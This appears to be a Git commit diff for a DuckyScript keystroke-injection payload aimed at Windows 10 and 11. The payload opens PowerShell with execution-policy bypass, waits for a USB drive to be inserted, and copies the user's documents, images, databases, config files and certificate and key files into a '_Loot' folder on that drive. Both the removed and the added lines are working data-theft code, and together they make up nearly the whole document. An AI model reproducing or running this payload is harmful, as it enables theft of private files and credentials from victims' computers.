Update Exfiltrate Files to USB Drives.txt
This commit is contained in:
egieb
@@ -1,8 +1,11 @@
|
||||
REM Title: Exfiltrate files to Removable Drives
|
||||
REM Title: Exfiltrate files to Removable Drive
|
||||
REM Author: @beigeworm
|
||||
REM Description: This Script finds all USB drives and attempts to copy many user files to them. (searches user folders for pictures, video, text files etc..)
|
||||
REM Description: Waits for a new USB Storage device to be connected and then copies many user files to that USB drive
|
||||
REM Target: Windows 10 and 11
|
||||
|
||||
REM 1. Run this script.
|
||||
REM 2. Connect your USB drive
|
||||
|
||||
REM some setup for dukie script
|
||||
DEFAULT_DELAY 100
|
||||
|
||||
@@ -11,5 +14,5 @@ DELAY 750
|
||||
STRING powershell -NoP -Exec Bypass
|
||||
ENTER
|
||||
DELAY 4000
|
||||
STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };if($removableDrives.Length -eq 0){Write-Host "No Removable Drives Found.. Exiting";break}foreach($drive in $removableDrives){$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if(-not(Test-Path -Path $destinationPath)){New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach($folder in $foldersToSearch){Write-Host "Searching in $folder";foreach($extension in $fileExtensions){$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach($file in $files){$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete."};exit
|
||||
ENTER
|
||||
STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };$count = $removableDrives.count;Write-Host "Connect a USB Drive.";While ($count -eq $removableDrives.count){$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };sleep 1};$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1;$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if (-not(Test-Path -Path $destinationPath)) {New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach ($folder in $foldersToSearch) {Write-Host "Searching in $folder";foreach ($extension in $fileExtensions) {$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach ($file in $files) {$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete.";exit
|
||||
ENTER
|
||||
|
||||
Reference in New Issue
Block a user